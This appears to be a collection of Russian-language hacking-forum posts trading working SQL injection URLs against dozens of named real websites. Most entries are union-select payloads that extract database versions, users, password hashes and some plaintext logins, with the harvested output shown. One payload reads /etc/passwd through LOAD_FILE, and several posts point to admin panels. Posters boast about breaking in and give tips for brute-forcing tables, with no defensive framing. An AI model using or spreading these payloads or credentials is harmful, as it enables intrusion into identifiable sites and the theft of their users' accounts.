http://www.sieve.gr/gr/news.php?id=-142+union+select+1,2,concat_ws(0x2f,version(),user(),database()),4/* 4.1.22-standard/sieve@localhost/sieve_gr Есть таблица users Колонки в ней не подобрал ----------------------------------------------------------------------- http://www.x-plorer.gr/news.php?id=-8+union+select+1,2,concat(user,char(58),password),4,5+from+mysql.user/* root:*046A241131BA9D25793B8012B8DCA213827E3DB9 Все таблицы http://www.x-plorer.gr/news.php?id=-8+union+select+table_name,2,3,4,5+from+information_schema.tables/* Все колонки http://www.x-plorer.gr/news.php?id=-8+union+select+column_name,2,3,4,5+from+information_schema.columns/* Там есть еще и phpBB форум))
http://www.jetskiworld.gr/news.php?id=-626+union+select+1,2,3,4,concat_ws(0x2f,version(),user(),database()),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57/* 4.1.20-log/[email protected]/331329_jetskiworld ----------------------------------------------------------------------- http://www.sedici.gr/news.php?id=-2+union+select+1,2,3,4,5,6,concat_ws(0x2f,version(),user(),database()),8,9/* 4.1.19-standard-log/sedicig@localhost/sedicig_db Включите колонки погромче (на сайте играет музыка как раз для взлома) и брутьте таблицы и колонки)) ----------------------------------------------------------------------- http://www.naserron.gr/news.php?id=-197+union+select+1,2,concat_ws(0x2f,version(),user(),database()),4,5/*&sub=show 5.0.33-log/naserron@localhost/naserron Все таблицы: http://www.naserron.gr/news.php?id=-197+union+select+1,2,3,table_name,5+from+information_schema.tables/*&sub=show Все колонки http://www.naserron.gr/news.php?id=-197+union+select+1,2,3,column_name,5+from+information_schema.columns/*&sub=show ----------------------------------------------------------------------- http://www.rea.org.gr/gr/news.php?id=-72+union+select+1,concat_ws(0x2f,version(),user(),database()),3,4,5/* 4.1.22-standard/reaorg@localhost/reaorg_1 Есть таблица users Колонки не подобрал ----------------------------------------------------------------------- http://www.omase.gr/gr/news.php?id=-12+union+select+1,2,3,4,5+from+users/* ----------------------------------------------------------------------- http://www.todaneio.gr/news.php?id=-181+union+select+1,2,3,CONVERT(concat_ws(0x3a,version(),user(),database())+using+latin1),5,6,7,8,9,10,11,12,13,14/* 4.1.14:daneio@localhost:todaneio
http://www.alpharent.gr/gr/news.php?id=17+union+select+1,2,3,4+from+users/* ----------------------------------------------------------------------- http://www.alogoskoufis.gr/news.php?version=gr&id=-184+union+select+1,concat_ws(0x2f,version(),user(),database()),3/*&view=more 4.1.22-standard/alogos_user@localhost/alogos_db ----------------------------------------------------------------------- http://www.silvestridis.gr/news.php?id=-1+union+select+1,%20%20concat_ws(0x2f,version(),user(),database()),3,4,5/* 4.1.22-standard/silvestr_yiannos@localhost/silvestr_silvestridis Есть таблица users
http://www.davinciinstitute.com/page.php?ID=299'+union+select+1,2,3,concat_ws(0x2f,version(),user(),database()),5,6+from+inform ation_schema.columns/* 5.0.42/davinci@localhost/davinciinstitute_com -------------------------------------------------------------------- http://www.bigrap.ru/index.php?mod=multimedia&action=music&album_id=-12+union+select+1,null,concat_ws(0x3a,version(),database(),user()),4,5,6,concat_ws(0x3a,name,pass),8,9,10,11+from+sla mchik_rap.users+limit+3,7/* Login:saniol pass:dancer2j 5.0.45-community:slamchik_rap:slamchik_slam@localhost
http://www.newera.com.na/page.php?id=25+union+select+1,2,concat_ws(0x3a,version(),user(),database()),4,5,6/*
spacetravel.tomsk.ru HTML: http://spacetravel.tomsk.ru/index.html?div=2forum&topic=-194+union+select+0,1,2,3,4,5,6/*&start=0 HTML: http://spacetravel.tomsk.ru/index.html?div=2forum&topic=-194+union+select+0,1,2,concat(USER(),0x3a,VERSION(),0x3a,DATABASE()),4,5,6/*&start=0 USER:spacetravelwww@localhost VERSION:4.0.26 DATABASE:spacetravelwww
Code: http://askort.com/?item_id=1+and+2=0+union+select+1,AES_DECRYPT(AES_ENCRYPT(version(),0x71),0x71),3,4/* USER : maxivanov_askort@localhost VERSION : 4.1.11 DATABASE : maxivanov_askort
bravotour.ru HTML: http://www.bravotour.ru/cont.php?id=-186+union+select+0,1,concat(USER(),0x3a,VERSION(),0x3a,DATABASE()),3/* USER:bravotou_bravo@localhost VERSION:4.1.22-standard-log DATABASE: bravotou_bravobase rsci.ru HTML: http://www.rsci.ru/smi/?id=10204+union+select+0,concat(USER(),0x3a,VERSION(),0x3a,DATABASE())/* USER:[email protected] VERSION:4.0.27-log DATABASE:rsci HTML: http://www.rsci.ru/smi/?id=10204+union+select+0,concat(id,0x3a,name,0x3a,passwd)+from+users+limit+2,2/* 10:administrator:.hbq 2:Юрий:.hbq HTML: http://www.rsci.ru/admin/
http://mercury-sochi.ru/news/index.php?type=rn&newsid=-1+union+select+1,2,3,4,5,concat_ws(0x2F,version(),database(),user()),7,8,9,10/* 4.1.22/merc16/merc16@localhost ---------------------------------------------------------------------------- http://www.home-collection.ru/catalog.php?id=-1+union+select+1,2,concat_ws(0x2F,version(),database(),user())/* 5.0.45-log/u12151/[email protected] ---------------------------------------------------------------------------- miheeff.net http://miheeff.net/news.php?news_id=-1+union+select+concat_ws(0x2F,version(),database(),user()),2,3/* 5.0.33/db5179d/us5179d@localhost http://miheeff.net/news.php?news_id=-1+union+select+concat_ws(0x2F,login,pass),2,3+from+logins+limit+2,1/* логин/пароль alia/zzzxxx
http://www.dukemednews.org/news/article.php?id=10059+union+select+0,1,2,3,user,password,6,7+from+mysql.user/* зачооот ))).Первый раз чето сделал гг))) всем пасибко =)
http://www.crosdeladonno.com/1top/rate.php?site=-1+union+select+concat_ws(0x3a,name,password,email),2+from+top_user+limit+0,1/* http://www.wordtec.com/TopSites/rate.php?site=-1+union+select+concat_ws(0x3a,database(),user()),2/* http://www.crosdeladonno.com/1top/rate.php?site=-1+union+select+concat_ws(0x3a,name,password,email),2+from+top_user+limit+0,1/*
Code: http://www.linspire.com/linspire_letter_archives.php?id=1+and+2=0+union+select+1,concat_ws(0x3a,version(),user()),3,4/* version : 4.0.27-standard-log user : [email protected]
www.chatelet-theatre.com HTML: http://www.chatelet-theatre.com/fiche_spectacle.php?id=-146+UNION+SELECT+concat_ws(0x3a,version(),user(),database()),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27/* 4.1.20:root@localhost:chatelet HTML: http://www.chatelet-theatre.com/fiche_spectacle.php?id=-146+UNION+SELECT+concat_ws(0x3a,user,password),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+FROM+mysql.user/* root:3def4e5361e65bde (user: pass(hash)) (http://www.chatelet-theatre.com/admin/) HTML: http://www.chatelet-theatre.com/fiche_spectacle.php?id=-146+UNION+SELECT+LOAD_FILE(0x2f6574632f706173737764),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27/* root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news: uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0: operator:/root:/sbin/nologin ...
http://www.dukemednews.duke.edu/news/article.php?id=-801+union+select+1,concat_ws(0x3a,user,password),3,4,5,6,7,8+FROM+mysql.user/*
http://www.sportingwheelies.org.au/ Админку не нашел, но зато штук десять акков добыть можно (правда нахрен они без админки большой вопрос xD).
http://www.naushko.ru/whisper.php?id=36231+union+select+1,2,3,4,5,6/* Поля подобрал, а что дальше делать - хз
http://forum.antichat.ru/showpost.php?p=552492&postcount=4446 да и тему от баянов чистить иногда надо... Code: http://[COLOR=YellowGreen]www.jomacs.org/[/COLOR]article.php?article_id=-1+union+select+1,2,concat_ws(0x3a,user_login,password,email,user_id),4,5,6,7,8,9+from+members+limit+0,1/* Code: http://[COLOR=YellowGreen]www.jomacs.org[/COLOR]/article.php?article_id=-1+union+select+1,2,concat(username,0x3a,user_password,0x3a,user_email,0x3a,user_icq),4,5,6,7,8,9+from+phpbb_users+limit+1,1/*
http://www.newstalk.co.nz/anndetail.asp?region=1+or+1=@@version 'Microsoft SQL Server 2000 http://www.newstalk.co.nz/anndetail.asp?region=1+or+1=(select+top+1+cast(login_name+as+nvarchar)%2B%27%3A%27%2Bcast(password+as+nvarchar)%2B%27%3A%27%2Bcast(email_address+as+nvarchar)%20from%20admin_logins) http://www.kathyspies.com/anndetails.asp?NewsID=1+or+1=@@version 'Microsoft SQL Server 2000 http://tlcwalford.com/anndetails.asp?NewsID=1+or+1=@@version 'Microsoft SQL Server 2005 http://www.titans-consulting.com/anndetails.asp?id=1+or+1=@@version 'Microsoft SQL Server 2005
www.respectfamily.com - Respect Records Digital (Drum & Bass) Code: http://www.respectfamily.com/index.php?mod=members&op=viewmember&id=-41+union+select+0,1,2,3,4+from+members/*
